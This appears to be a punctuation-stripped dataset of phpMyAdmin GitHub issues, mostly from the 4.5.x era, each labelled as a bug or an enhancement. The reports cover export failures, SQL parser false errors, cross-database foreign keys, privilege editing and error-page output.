themes pmahomme img s host.png width= 16 height= 16 alt= > 10.209.1.123< a> <span class= separator ><img class= icon src= .
themes pmahomme img item ltr.png width= 5 height= 9 alt= >< span> <a href= db structure.php?db=122370 smartmarketsrilanka amp;token=f23bb1ee777079e38fa190ae832d1ee0 class= item > <img class= icon src= .
themes pmahomme img s db.png width= 16 height= 16 alt= > 122370 smartmarketsrilanka< a> <span class= separator ><img class= icon src= .
themes pmahomme img item ltr.png width= 5 height= 9 alt= >< span> <a href= sql.php?db=122370 smartmarketsrilanka amp;table=tblproductsubcattextfieldvaule amp;token=f23bb1ee777079e38fa190ae832d1ee0 class= item > <img class= icon src= .
themes pmahomme img s tbl.png width= 16 height= 16 alt= > tblproductsubcattextfieldvaule< a> < div> <!
PMA SQL ERROR > <div class= error ><h1>Error< h1> <p><strong>SQL query < strong> <a href= tbl sql.php?sql query=SHOW TABLE STATUS FROM 60122370 smartmarketsrilanka 60 LIKE 27tblproductsubcattextfieldvaule 27 amp;show query=1 amp;db=122370 smartmarketsrilanka amp;table=tblproductsubcattextfieldvaule amp;token=f23bb1ee777079e38fa190ae832d1ee0 ><span class= nowrap ><img src= .
themes pmahomme img b edit.png title= Edit alt= Edit class= icon width= 16 height= 16 > Edit< span>< a> < p> <p> <span class= syntax ><span class= inner sql ><a href= .
url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.5 2Fen 2Fshow.html amp;token=f23bb1ee777079e38fa190ae832d1ee0 target= mysql doc ><span class= syntax alpha syntax alpha reservedWord >SHOW< span>< a> <span class= syntax alpha syntax alpha reservedWord >TABLE< span> <span class= syntax alpha syntax alpha reservedWord >STATUS< span> <span class= syntax alpha syntax alpha reservedWord >FROM< span> <span class= syntax quote syntax quote backtick >`122370 smartmarketsrilanka`< span> <span class= syntax alpha syntax alpha reservedWord >LIKE< span> <span class= syntax quote syntax quote single > tblproductsubcattextfieldvaule < span>< span>< span> < p> <p> <strong>MySQL said < strong><a href= .
url.php?url=http 3A 2F 2Fdev.mysql.com 2Fdoc 2Frefman 2F5.5 2Fen 2Ferror messages server.html amp;token=f23bb1ee777079e38fa190ae832d1ee0 target= mysql doc ><img class= icon src= .
themes pmahomme img b help.png width= 11 height= 11 alt= Documentation title= Documentation >< a> < p> <code> 2006 MySQL server has gone away < code><br > < div><script type= text javascript > <!
[CDATA[ document).ready function ){ updates current settings if window.parent.setAll) { window.parent.setAll en , utf8 general ci , 1 , 122370 smartmarketsrilanka , tblproductsubcattextfieldvaule , f23bb1ee777079e38fa190ae832d1ee0 ); } set current db, table and sql query in the querywindow if window.parent.reload querywindow) { window.parent.reload querywindow 122370 smartmarketsrilanka , tblproductsubcattextfieldvaule , ); } if window.parent.frame content) { reset content frame name, as querywindow needs to set a unique name before submitting form data, and navigation frame needs the original name if typeof window.parent.frame content.name) != undefined window.parent.frame content.name != frame content ) { window.parent.frame content.name = frame content ; } if typeof window.parent.frame content.id) != undefined window.parent.frame content.id != frame content ) { window.parent.frame content.id = frame content ; } window.parent.frame content.setAttribute name , frame content ); window.parent.frame content.setAttribute id , frame content ); } }); ]]> < script> < body> < html>","bug"
"24444","11536","Format of exports looses SQL on 2nd export.
This relates to Version 4.4.14 as part of the typo3 extension).
According to the change logs I have not seen that this had been resolved.
On exporting databases one can select the format of the ouput SQL, CSV, etc.).
The top of the list is SQL .
If you re do the export without choosing another function in between, the option SQL is gone.
!
[ screen shot 2015 10 04 162423b] https cloud.githubusercontent.com assets 6077916 10268423 78b471c0 6ab8 11e5 8f83 791a4c05bc42.jpg) !
[ screen shot 2015 10 04 162354b] https cloud.githubusercontent.com assets 6077916 10268425 7f17c0da 6ab8 11e5 853c a5b89bc95c32.jpg) Workaround you can just select anything else, go to the export function again and the SQL will be there again.","bug"
"24444","11538","Copy multiple tables to database.
As of PhpMyAdmin 4.5.0 .2), the option to copy multiple tables to another database seems to have disappeared !
[copy table gone] https cloud.githubusercontent.com assets 361423 10279329 be92dd2c 6b5c 11e5 8eb7 65b86721fdcb.png)","enhancement"
"24444","11539","Rename table does not result in refresh in left panel.
On renaming a table, a refresh in the left does not get triggered.
The result is that the link for that table name, which is to the old one, does not then work, generating a modal dialog.
This is observed in 4.5.0 .2).","bug"
"24444","11540","Undefined property PMA Table db name.
Notice Undefined property PMA Table db name This report is related to user submitted report [ 15237] https reports.phpmyadmin.net reports view 15237) on the phpmyadmin error reporting server.","bug"
"24444","11541","Missing arguments for PMA Table generateAlter ).
Missing argument 13 for PMA Table generateAlter ), called in home http pma libraries controllers TableStructureController.class.php on line 769 and This report is related to user submitted report [ 15423] https reports.phpmyadmin.net reports view 15423) on the phpmyadmin error reporting server.","bug"
"24444","11542","Import parser and backslash.
When we try to import this line with phpmyadmin 4.5.0.2, we get an error 58, Test , Test , 3, Test , , 0, Test , Test , 3, , , , , Test , 0, 50, 32, 0, 0, 0, 0, , 0, , , , \\\\ elem).val ) \\\\ , 0, 0, 0, 0, 0, 0, 1, , , test , , , , test , , , , 0, 0000 00 00 00 00 00 ), It works with version 4.2.10.1 4.4.15 The problem is the string \\\\ Edit Github remove double \","bug"
"24444","11544","Notices about undefined indexes on structure pages of information schema tables.
Found on version 4.5.0.2 See the attached image","bug"
"24444","11546","Visualize GIS data seems to be broken.
After updating to 4.5.x the page just hangs when selecting Visualize GIS data In previous versions this feature worked very well","bug"
"24444","11547","distinct removed from query while query result export to excel.
I m execute simple query SELECT distinct FROM `node` WHERE 1 683 records total) and try export result to excel but to excel exported result of query SELECT FROM `node` WHERE 1 over 1200 record total) 4.5.0.2","bug"
"24444","11548","Confirm box on Reset slave option.
On the replication menu, under slave replication, control slave, there are 2 options Full start Reset slave !
[screen shot 2015 10 08 at 11 24 14] https cloud.githubusercontent.com assets 194999 10362489 2af8de7c 6daf 11e5 8610 11b782077492.png) Whenever a slave stops working, I fix it and then proceed to start the slave.
Only problem is today I hit Reset slave instead of Full start .
Without any confirmation of any kind, it proceeded to effectively reset the slave parameters, making a very simple operation a living hell because I hadn t written down beforehand the position of the logs who would want to hit reset slave instead of starting it?
), I had to temporarily redirect frontend traffic to another machine, stop another slave, make a dump of quite a few GBs, start the other slave again, import the dumps, adjust the slave parameters, start the slave and redirect all traffic back to the frontend again.
Therefor the request to add a confirm box on this rather destructive option.
Another option would be to add a spacer of some kind between these options, so that hitting reset slave isn t too close to start slave .
Another great option would be to have a small explanation of each option as a separator.
Which method you prefer to finally adopt I don t really care, but please... please!
don t make me go through this one again.
Greetings and thanks.","enhancement"
"24444","11549","Pomp Error message and can t edit database.
When I try to edit the database, it shows Some errors has been detected on the server, Please view at the bottom of the window ignore All Ignore Notice in .
tbl change.php 192 Undefined variable column Backtrace When I click the Ignore button, the message is disappeared, but I can not edit the database yet.
I disable report error message as following, but it does not work, the Error message still prompts out cfg[ SendErrorReports ] = never ; in config.inc.php Could you please fix it asap?
Update after restarting the server, it works now","bug"
"24444","11550","Regression in Find and replace.
Tested with current master b5d6170b2280d22a191f3127ef8955f516948afa).
To reproduce Browse sakila.actor2 a copy of sakila.actor) Search > Find and replace Find PENELOPE Replace with TOTO Go Replace error 500 .
However, clicking again on Replace works.
Tried to bisect but am not sure of the result, since there are intermediate errors during the bisect.
Possible bad commit 7b8c4a4b6708e4f846ec2d7d106db09dc6a8285e","bug"
"24444","11551","Fatal error when switched to master from QA 4 5. .
Clearing cache does not help.
Clearing cookies fixes this.
However we should be able to clear invalidte cookie automatically upon upgrading","bug"
"24444","11553","SQL Error upon login.
Hello, So on the latest master I am now experiencing the following error when logging into some of my MySQL servers not all) Error SQL query DocumentationEdit Edit SELECT FROM information schema.CHARACTER SETS MySQL said Documentation 2006 If I remove everything except the base url itself, it takes me to the main server on my list which is logged in and gives me a bunch of tracebacks Warning in .
libraries dbi DBIMysqli.php 243 mysqli query ) SSL operation failed with code 1.
OpenSSL Error messages error 0607A082 digital envelope routines EVP CIPHER CTX set key length invalid key length error 0607A082 digital envelope routines EVP CIPHER CTX set key length invalid key length Backtrace .
libraries dbi DBIMysqli.php 243 mysqli query object, string SELECT FROM information schema.CHARACTER SETS , integer 0, ) .
libraries DatabaseInterface.php 240 PMA\libraries\dbi\DBIMysqli >realQuery string SELECT FROM information schema.CHARACTER SETS , object, integer 0, ) .
libraries DatabaseInterface.php 88 PMA\libraries\DatabaseInterface >tryQuery string SELECT FROM information schema.CHARACTER SETS , NULL, integer 0, boolean true, ) .
libraries mysql charsets.inc.php 21 PMA\libraries\DatabaseInterface >query string SELECT FROM information schema.CHARACTER SETS ) .
libraries common.inc.php 1023 include once .
libraries mysql charsets.inc.php) .
index.php 13 require once .
libraries common.inc.php) Warning in .
libraries dbi DBIMysqli.php 243 mysqli query ) MySQL server has gone away Backtrace .
libraries dbi DBIMysqli.php 243 mysqli query object, string SELECT FROM information schema.CHARACTER SETS , integer 0, ) .
libraries DatabaseInterface.php 240 PMA\libraries\dbi\DBIMysqli >realQuery string SELECT FROM information schema.CHARACTER SETS , object, integer 0, ) .
libraries DatabaseInterface.php 88 PMA\libraries\DatabaseInterface >tryQuery string SELECT FROM information schema.CHARACTER SETS , NULL, integer 0, boolean true, ) .
libraries mysql charsets.inc.php 21 PMA\libraries\DatabaseInterface >query string SELECT FROM information schema.CHARACTER SETS ) .
libraries common.inc.php 1023 include once .
libraries mysql charsets.inc.php) .
index.php 13 require once .
libraries common.inc.php) Warning in .
libraries dbi DBIMysqli.php 243 mysqli query ) Error reading result set s header Backtrace .
libraries dbi DBIMysqli.php 243 mysqli query object, string SELECT FROM information schema.CHARACTER SETS , integer 0, ) .
libraries DatabaseInterface.php 240 PMA\libraries\dbi\DBIMysqli >realQuery string SELECT FROM information schema.CHARACTER SETS , object, integer 0, ) .
libraries DatabaseInterface.php 88 PMA\libraries\DatabaseInterface >tryQuery string SELECT FROM information schema.CHARACTER SETS , NULL, integer 0, boolean true, ) .
libraries mysql charsets.inc.php 21 PMA\libraries\DatabaseInterface >query string SELECT FROM information schema.CHARACTER SETS ) .
libraries common.inc.php 1023 include once .
libraries mysql charsets.inc.php) .
index.php 13 require once .
libraries common.inc.php) Notice in .
libraries charset conversion.lib.php 106 iconv ) Wrong charset, conversion from `CP1252 to `utf 8 TRANSLIT is not allowed Backtrace .
libraries charset conversion.lib.php 106 iconv string CP1252 , string utf 8 TRANSLIT , string MySQL server has gone away , ) .
libraries DatabaseInterface.php 342 PMA convertString string CP1252 , string utf 8 , string MySQL server has gone away , ) .
libraries DatabaseInterface.php 2173 PMA\libraries\DatabaseInterface >convertMessage string MySQL server has gone away ) .
libraries dbi DBIMysqli.php 418 PMA\libraries\DatabaseInterface >formatError integer 2006, string MySQL server has gone away , ) .
libraries DatabaseInterface.php 2613 PMA\libraries\dbi\DBIMysqli >getError object) .
libraries DatabaseInterface.php 89 PMA\libraries\DatabaseInterface >getError NULL) .
libraries mysql charsets.inc.php 21 PMA\libraries\DatabaseInterface >query string SELECT FROM information schema.CHARACTER SETS ) .
libraries common.inc.php 1023 include once .
libraries mysql charsets.inc.php) .
index.php 13 require once .
libraries common.inc.php)","bug"
"24444","11555","Cannot create new user.
Just downloaded 4.5.0.2.
Creating a new user .","bug"
"24444","11556","Cannot create table, please enter a valid lenght keeps coming up.
See the shot !
[shot] https cloud.githubusercontent.com assets 1302896 10409208 902e7f1e 6f16 11e5 8c05 b2c1bc3bafe6.png)","bug"
"24444","11558","Can t execute SQL with subquery.
Hello Developers, PMA 4.5.0.2 OS Centos 6.5 DB MariaDB server 10.0.21 1.el6.x86 64 I am trying to execute SQL .
but face the following error ==== Static analysis 2 errors were found during analysis.
Unrecognized keyword.
near EXISTS at position 237) Unexpected token.
near at position 244) SQL query Documentation SELECT pa.id, pa.product id, pa.supplier code, pa.sid, p. FROM `products all` pa LEFT JOIN products p ON p.sid=pa.sid and p.supplier code=pa.supplier code WHERE pa.`product id` IS NULL AND pa.`sid` IS NOT NULL AND pa.`outdated` = 0 and EXISTS LIMIT 0, 25 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near LIMIT 0, 25 at line 1 === it seems that query is cut.
Your hep would be very appreciated.
Do not hesitate to ask if you need additional information.","bug"
"24444","11561","Cannot use third party auth plugins.
While creating in a new user, since we have hard coded the options for choosing the authentication plugin namely `mysql native password`, `mysql old password` and for 5.6 `sha256 password`), the users will not be able to create users with any other authentication plugin that they might have installed For example, Percona authentication plugin for MySQL).
We should support this dynamically checking for all available and enabled authentication plugins listed in `information schema`.`plugins`.","bug"
"24444","11565","No UI to relog when using auth type = config.
When using auth type config the login credentials are pulled from the config file, and therefore the login page and the logout button is not shown.
This conflicts with certain functionality that requires you to log out and back in.
For example, to reload the config file after updating to a newer version and adding the new phpmyadmin tables.
As it stands now, to make this happen I have to get rid of the old php session data, either by deleting the session file serverside, or by deleting the browser cookie.
Or use a hack like .. Restarting the webserver does not help since the config file seems to be embedded in the session data.","bug"
"24444","11568","Erroneous handling of tables with FKs to other databases.
Expected Child tables having FKs to parent tables in other databases can be browsed and searched without hassle.
In the Relation View of such a child table, there should be three Foreign key constraint dropdowns next to each other, containing parentDatabase , parent and id , respectively.
see below for identifiers) Observed Child tables having FKs to parent tables in other databases can be browsed and searched but error stacktraces show up at the bottom of the main div see below).
In the Relation View of such a child table, there are only two Foreign key constraint dropdowns next to each other, containing childDatabase , and parentDatabase , respectively, which makes no sense.
see below for identifiers) Reproduction To reproduce the problem, execute the following statements .
Trying to bring up the Search interface now results in the following error being shown at the bottom of the main div .
For this to happen, no records need to be present.
After inserting records to both the parent and child table, the Browse view breaks as well for the child table.
.
The following error is shown in the main div .
Additional notes This problem did not exist in the PMA 4.1.x series.
Considering what the child table s Relation View displays, the issue s cause seems to be some namespacing prefixing breakage.
Server and PMA Versions Database Server Server version 5.6.15 log MySQL Community Server GPL) Web Server Apache 2.4.7 Ubuntu) Database client version libmysql mysqlnd 5.0.11 dev 20120503 Id bf9ad53b11c9a57efdb1057292d73b928b8c5c77 PHP extension mysqli PHP version 5.5.9 1ubuntu4.13 phpMyAdmin 4.5.0.2","bug"
"24444","11571","FEATURE Handle COLUMN JSON.
Hi Being able to view and handle COLUMN JSON, etc.
would be really nice https mariadb.com kb en mariadb column json Currently only BLOB shows.","enhancement"
"24444","11572","export not work .
The export a query does not work, if these lists aliases for table names.
The version is phpmyAdmin 4.5.0.
Regards ReSi1175","bug"
"24444","11575","4.5.0.2 throws error on almost everything IIS).
Hello After updating to 4.5.0.2 I get a lot of errors all the time.
So many that I started using another platform.
Looks like this every time I select a table.
MySQL 5.6.23 and PMA running on IIS 8.5.
It did not do this in the previous version 4.4 something don t recall) that I used.
I also get a blank screen every time I log in.
Now I have to refresh the page to get it to display anything.
Pretty much just broke PMA this version.
Notice in .\libraries\DisplayResults.class.php 4770 Undefined offset 0 Backtrace .\libraries\DisplayResults.class.php 4380 PMA DisplayResults > setParamForLinkForeignKeyRelatedTables array) .\libraries\sql.lib.php 1585 PMA DisplayResults >getTable object, array, array, ) .\libraries\sql.lib.php 1863 PMA getHtmlForSqlQueryResultsTable object, string .
themes pmahomme img , NULL, array, boolean true, string 342 , integer 25, NULL, object, array, ) .\libraries\sql.lib.php 2068 PMA getQueryResponseForResultsReturned object, array, string retro , string people , NULL, NULL, object, string .
themes pmahomme img , string 342 , integer 25, NULL, NULL, NULL, NULL, NULL, string SELECT FROM `people` , NULL, ) .\libraries\sql.lib.php 1946 PMA executeQueryAndGetQueryResponse array, boolean true, string retro , string people , NULL, NULL, NULL, NULL, NULL, NULL, string , string .
themes pmahomme img , NULL, NULL, NULL, string SELECT FROM `people` , NULL, NULL, ) .\sql.php 217 PMA executeQueryAndSendQueryResponse array, boolean true, string retro , string people , NULL, NULL, NULL, NULL, NULL, NULL, string , string .
themes pmahomme img , NULL, NULL, NULL, string SELECT FROM `people` , NULL, NULL, )","bug"
"24444","11577","Table aliases ignored when using intellisense.
Let s say I start my SQL with the following SELECT FROM mytest t WHERE If at this point I type t. the intellisense will correctly show me the columns in the table mytest, however when I select the column in question the t. gets overwritten with the full table name.
If aliases are in use it should use them throughout the query, not replace them.
Hopefully that s clear enough.
Version Software Info PhpMyAdmin 4.4.14.1 Chrome Windows 10 MySQL 5.5.39 PHP 5.4.34","bug"
"24444","11579","Content Security Policy.
Hi.
Installed phpmyadmin from reposy Debian Jessie, when loged in panel got error in console Google Chrome .
How to fix it?","bug"
"24444","11583","Cross DB foreign key constraints results in undefined offsets.
I couldn t find this reported before) I have a number of cross DB foreign key constraints, these seems to upset phpMyAdmin Version information 4.5.0.2 up to date) Database client version libmysql 5.6.27 PHP extension mysqli Documentation PHP version 5.5.9 1ubuntu4.13 Steps to reproduce 1.
Create 2 databases 2.
Create a INNODB) table in each 3.
Add a foreign key constant to one referencing the other table in the other DB .
Browse or insert a row on the table with the constraint, and you will get 1 or more PHP notices about Undefined offset 0 The normal select field for inserting is missing, and browsing doesn t have the on hover foreign display field.
Also stops other foreign keys from working as expected Inserting .
Browsing .","bug"
"24444","11584","security issue).","bug"
"24444","11585","Configure port number other than default mysql 3306 port.
Is there a way to specify port number say 3307)?
The scenario is we host multiple mysqls on the same machine but listening on different ports.","bug"
"24444","11586","PMA creates mediumint as length 9 by default.
This makes no sense.
There s no case where mediumint would ever be 9 characters long.
Signed range 8388608 to 8388607 8 characters) Unsigned range 0 to 16777215 again, 8 characters).
Is there a reason we re defaulting to 9 that I don t know about?
Or is this MySQL defaulting to 9 for some reason?","bug"
"24444","11587","Upgrade error to new version of phpmyadmin.
I wanted to upgrade to a new version of phpmyadmin over aptitude and now im always getting this error http puu.sh kOxtR.png What can i do to fix this problem?","bug"
"24444","11589","Incorrect parameter in mysqli fetch fields ).
mysqli fetch fields ) expects parameter 1 to be mysqli result, boolean given This report is related to user submitted report [ 15230] https reports.phpmyadmin.net reports view 15230) on the phpmyadmin error reporting server.","bug"
"24444","11590","Parser Array to string conversion.
Array to string conversion This report is related to user submitted report [ 15635] https reports.phpmyadmin.net reports view 15635) on the phpmyadmin error reporting server.","bug"
"24444","11592","Missing headers in zipped export.
Can be reproduced in 4.5.0.2 and the upcoming 4.5.1 which is bugfix frozen).
When exporting a table with Custom> Compression > zipped, the whole section before Database is missing.","bug"
"24444","11594","only db config option bug when db names contain underscore and are grouped.
I m using the only db config option too limit the list to just 2 databases thus cfg[ Servers ][ i][ only db ]= array ink\ log , ink\ map ); This works fine in the right panel but in the the left panel it shows all database which which begin with ink 10 databases in my case)","bug"
"24444","11595","Refuses to execute valid SQL statement.
Hi, while trying to execute the below SQL statement in my WP database, I get 2 errors.
Works perfectly in the mysql commandline client.
Statement SELECT FROM wp postmeta WHERE post id NOT IN SELECT id FROM wp posts); Errors Unexpected keyword near NOT IN at position 40) Unexpected character near at position 47) Seems like 1) a misguided validation or 2) phpMyadmin does some changes to the statement without giving a word which makes it difficult to analyze the error).
Regards, Daniel","bug"
"24444","11596","Blank page and client side errors.
When i trying to load my phpMyAdmin, i receive some errors on my Mozilla Firefox 41.0.2 in JavaScript console SyntaxError missing name after .
operator get scripts.js.php 1181 26314 ReferenceError is not defined get scripts.js.php 3 1 ReferenceError is not defined messages.php 362 1 TypeError PMA commonParams is undefined And i have a blank page after that without any login form.
It s about version 4.5.1.","bug"
"24444","11597","Huge binary log growth on 4.5.x.
Hi, Here s an issue which didn t occur before 4.5.x huge binary log growth due to unnecessary queries being executed over and over again by phpMyAdmin.
I ve a master slave setup, and I ve noticed that the amount of generated binary logs got rather huge after upgrading to 4.5.
4.4.x does NOT have the issue.
Here s what is being executed by phpMyAdmin on presumably any action being made in the interface <code>FLUSH PRIVILEGES DELETE FROM `mysql`.`db` WHERE `host` = AND `Db` = AND `User` = LIMIT 1 INSERT INTO `mysql`.`db` `host`, `Db`, `User`) VALUES pma test host , mysql , pma test user ) DELETE FROM `mysql`.`db` WHERE host = pma test host AND Db = mysql AND User = pma test user LIMIT 1 UPDATE `mysql`.`db` SET `host` = WHERE `host` = AND `Db` = AND `User` = LIMIT 1 DELETE FROM `mysql`.`columns priv` WHERE `host` = AND `Db` = AND `User` = LIMIT 1 INSERT INTO `mysql`.`columns priv` `host`, `Db`, `User`, `Table name`, `Column name`) VALUES pma test host , mysql , pma test user , , ) DELETE FROM `mysql`.`columns priv` WHERE host = pma test host AND Db = mysql AND User = pma test user AND Table name = AND Column name = LIMIT 1 UPDATE `mysql`.`columns priv` SET `host` = WHERE `host` = AND `Db` = AND `User` = AND Column name = AND Table name = LIMIT 1 DELETE FROM `mysql`.`tables priv` WHERE `host` = AND `Db` = AND `User` = AND Table name = LIMIT 1 INSERT INTO `mysql`.`tables priv` `host`, `Db`, `User`, `Table name`) VALUES pma test host , mysql , pma test user , ) DELETE FROM `mysql`.`procs priv` WHERE `host` = AND `Db` = AND `User` = AND `Routine name` = AND `Routine type` = LIMIT 1< code> ... this goes over over again for no particular reason.
As stated earlier, no issues with 4.4.x releases, this is a new discovery in 4.5.x.
I m running phpMyAdmin on nginx 1.9.4 MySQL 5.6.25 0ubuntu0.15.04.1 log PHP 5.6.4 4ubuntu6.3","bug"
"24444","11598","Cookie auth error Class PMA\libraries\Util not found OS X).
<b>Fatal error< b> Uncaught Error Class PMA\libraries\Util not found in pma libraries Header.php 228 Stack trace 0 pma libraries Header.php 274) PMA\libraries\Header gt;getJsParams ) 1 pma libraries Header.php 205) PMA\libraries\Header gt;getJsParamsCode ) 2 pma libraries Header.php 131) PMA\libraries\Header gt; addDefaultScripts ) 3 pma libraries Response.php 97) PMA\libraries\Header gt; construct ) 4 pma libraries Response.php 126) PMA\libraries\Response gt; construct ) 5 pma libraries Response.php 381) PMA\libraries\Response getInstance ) 6 [internal function] PMA\libraries\Response response ) 7 {main} thrown in <b> pma libraries Header.php< b> on line <b>228< b><br > PHP 7.0.0 RC5 `master` branch `QA 4 5` is fine Steps to reproduce 1.
Use cookie auth.
2.
Use localhost MySQL server.
3.
Stop MySQL server.
4.
Try to log in to phpMyAdmin.","bug"
"24444","11599","Privileges Error on MariaDB 10.0.15.
Hi, I m trying to edit database s permission, when I click Privileges , it show an error.
.
Host OS Windows 8.1 x64 SQL Server 10.0.15 MariaDB Web Server nginx 1.7.9 PHP Version 5.6.14 PHP Extension mysqli Database client version libmysql mysqlnd 5.0.11 dev 20120503 phpMyAdmin Version 4.5.1 Thanks.","bug"
"24444","11600","SQL export crash when re imported.
Error SQL query !40101 SET CHARACTER SET CLIENT= OLD CHARACTER SET CLIENT ; MySQL said Documentation 1231 Variable character set client can t be set to the value of NULL","bug"
"24444","11602","Parser warnings subqueries).
When using latest release of XAMPP stack v5.6.14 a bug exists opening User Accounts with phpMyAdmin Version 4.5.1 and XAMPP stack v5.6.14 has Server version 10.0.17 MariaDB.
At times the bug does not appear other times an analysis finds 5 unexpected closing brackets which precludes you from getting to the User accounts that reside in Table User in the MySQL database, which is a serious problem.
A screen shot is attached.
!
[user accounts error] https cloud.githubusercontent.com assets 15304335 10713154 c88ce3d4 7a77 11e5 9cf2 0bc3603a2c9f.png)","bug"
"24444","11603","Namespace clash for class Error.
Not sure the exact steps conditions to recreate the issue.
However, this happened when I checkout master from QA 4 5. .","bug"
"24444","11604","Export with join table fails.
I have two problems 1.
If I execute a query with a joined field on the SELECT clause, from the joined table, then clicking on Export on the bottom of the page results, I have an endless redirection to the query box I can click to Execute again, but it just executes again the query) 2.
If I remove the joined field on the SELECT clause, I have the right export page with export option CSV in my case).
The exported file is just an HTML document with the error .
I can see from the Request Console that my table alias disappeared.
Exemple of SQL Query .
Is transformed to .
Latest stable version PhpMyAdmin 4.5.1","bug"
"24444","11605","Changing hostname kills password.
Hello everyone, we use phpMyAdmin 4.5.1 with MariaDB 10.0.
After upgrading from 4.5.0 we notice that changing a user s credentials, especially the hostname or ip range, destroys the password.
It has to be set manually again to re enable login.
Can you please have a look at this?
Thanks in advance!
CU, Patrick","bug"
"24444","11606","PMA Util not found when changing password.
When trying to change a user s password User accounts > Edit privileges > Change password, enter the new password and press Go), I get a popup notice about an internal server error and this in my Apache error log <pre> [Mon Oct 26 09 21 48.637152 2015] [ error] [pid 12772] [client 192.168.56.1 58089] PHP Fatal error Class PMA Util not found in var www pma dev libraries server privileges.lib.php on line 2123, referer http 192.168.56.102 pma dev server privileges.php?username=d hostname= 25 dbname= tablename= routinename= token=7177e1393aea05be4f3078746c7db251 [Mon Oct 26 09 21 48.637264 2015] [ error] [pid 12772] [client 192.168.56.1 58089] PHP Stack trace , referer http 192.168.56.102 pma dev server privileges.php?username=d hostname= 25 dbname= tablename= routinename= token=7177e1393aea05be4f3078746c7db251 [Mon Oct 26 09 21 48.637294 2015] [ error] [pid 12772] [client 192.168.56.1 58089] PHP 1.
{main} ) var www pma dev server privileges.php 0, referer http 192.168.56.102 pma dev server privileges.php?username=d hostname= 25 dbname= tablename= routinename= token=7177e1393aea05be4f3078746c7db251 [Mon Oct 26 09 21 48.637348 2015] [ error] [pid 12772] [client 192.168.56.1 58089] PHP 2.
PMA updatePassword ) var www pma dev server privileges.php 253, referer http 192.168.56.102 pma dev server privileges.php?username=d hostname= 25 dbname= tablename= routinename= token=7177e1393aea05be4f3078746c7db251 < pre>","bug"
"24444","11607","Unable to change password from Login information tab..
When on the User accounts > Edit privileges > Login information tab, if I change the user s password but no other account details, I get the message `Username and hostname didn t change` and no changes are saved.","bug"
"24444","11608","Analyzer doesn t recognize GRANT statements.
When executing simple GRANT statement like `` GRANT ALL ON sakila.
TO testuser `` Unrecognized statement type.
near GRANT at position 0)","bug"
"24444","11609","Errors when Analyzer fails.
Once SQL Analyzer fails see 11608), the browsing fails with several undefined stuff Undefined index is subquery Undefined index select from Undefined index is analyse This report is related to user submitted report [ 16070] https reports.phpmyadmin.net reports view 16070) on the phpmyadmin error reporting server.","bug"
"24444","11610","Undefined variable res rel.
Undefined variable res rel This report is related to user submitted report [ 16064] https reports.phpmyadmin.net reports view 16064) on the phpmyadmin error reporting server.","bug"
"24444","11611","Warning while exporting schema to PDF.
Invalid argument supplied for foreach ) This report is related to user submitted report [ 16065] https reports.phpmyadmin.net reports view 16065) on the phpmyadmin error reporting server.","bug"
"24444","11612","Undefined index new row format.
Undefined index new row format This report is related to user submitted report [ 16026] https reports.phpmyadmin.net reports view 16026) on the phpmyadmin error reporting server.","bug"
"24444","11614","Undefined variable db.
Undefined variable db This report is related to user submitted report [ 16099] https reports.phpmyadmin.net reports view 16099) on the phpmyadmin error reporting server.","bug"
"24444","11616","Incomplete import of .sql.zip in chunks.
Somewhere in the development of PHPMyAdmin, something has been lost and I can t quite put my finger on it but... Life was made harder recently when I exported an sql table off my dev server install of PHPMyAdmin and then uploaded in .sql.zip format.
I was asked repeatedly to upload the same 35MB file over and over, it got to the 300MB mark and my web browser had enough of PHPMyAdmin and crashed on on the web hosts PHPMyAdmin page.
It kept on telling me that after each submission that it would continue from point x and I was in a small way assured of progress only to find out today that the uploaded database file, instead of 1.74 Million records, only 1,892 had been imported.
The SQL file uploaded when uncompressed was 235MB.
As for myself, I am not completely satisfied by the result and feel that this can be further improved upon by allowing the following feature to occur...
The user uploads either by way of an upload interface in their hosting control panel like file manager, or alternatively the user uploads by FTP to a folder or location on the web server that... PHPMyAdmin can be informed of the location of that package on the server, uploaded once and it is told to get on with it, simple.
Instead we have this stupid convoluted re upload the same file over and over again that clearly does not work.
Its not like I have oodles of data allowance, this little jaunt has cost me the equivalent of 3 days surfing and facebook time on the internet...","enhancement"
"24444","11617","Getting real row count is not allowed for views.
While a link is there to allow getting real row counts in 4.5, latest git version simply displays 0 as the row count","bug"
"24444","11618","NOT IN clause not recognized MySQL 5.5.46 0 deb7u1) Plesk 12.0.18.
The simple request such as select from users where team id not in select id from teams) Type de serveur MySQL Version du serveur 5.5.46 0 deb7u1 Debian) php 5.4.45 0 deb7u2 I have seen this bug before, but it seems to be there again.
I already check many posts on stackoverflow http stackoverflow.com questions 32792381 mysql not in clause not recognized in phpmyadmin 4 5 0 2) but nothing to solve this issue...
If I try with another version of phpmyadmin, it s working without plesk) Server version 5.5.44 0 deb7u1 log Could you check it please ?","bug"
"24444","11619","TokuDB Tables Show Size as unknown .
It appears this was once touched on in report https github.com phpmyadmin phpmyadmin pull 1361 but nothing appears to have ever come of that or it was fixed and has broken again since).
Also the file modified to fix the issue in that post no longer exists.
!
[image] https cloud.githubusercontent.com assets 958670 10818094 b8175c42 7e36 11e5 8813 13f107a0bd12.png)","bug"
"24444","11621","Designer no longer shows foreign key relation lines initially.
In 4.4.15, as tested with the employees sample database, opening the Designer shows by default the relation lines, but in 4.5.1 no lines are shown by default.","bug"
"24444","11622","Reloading privileges is not allowed.
In master branch even when the user has RELOAD privilege, the link to reload privileges is not displayed in the User Accounts page.","bug"
"24444","11625","Incorrect number of downloads.
In README.rst, there is an old reference to .
If we cannot get that for free) from CDN77, we should probably remove this wrong stat.","bug"
"24444","11626","wrong row count for query results.
Queries with subqueries seem to give incorrect row counts.
I m not talking about the InnoDB concept of inaccurate row counts for tables but for query results.
For example, phpmyadmin thinks that the below query returns 20.000 rows but the real number is below 1.500, as verified in the MySQL console.
This is on phpMyAdmin version 4.5.1. select eOuter.userid from subscriptions eOuter inner join select userid, max canceldate) as m from subscriptions where istrial = 1 and canceldate is not null group by userid ) eInner on eOuter.userid = eInner.userid and eOuter.subscriptiondate > eInner.m and eOuter.istrial = 0","bug"
"24444","11627","[4.5.1] CREATE TABLE INSERT INTO executed twice ctrl enter).
When I execute an INSERT INTO CREATE TABLE query it s executed twice.
Example The table was EMPTY I tested it twice).
Screen http imgur.com pQbv0pN I executed that query with an empty table and it returned that the AUTO INCREMENT id is 2 so the query was executed twice).
Table after the query was executed http imgur.com eTt5kac It happened to me with some tables so it may be possible to be a general bug.
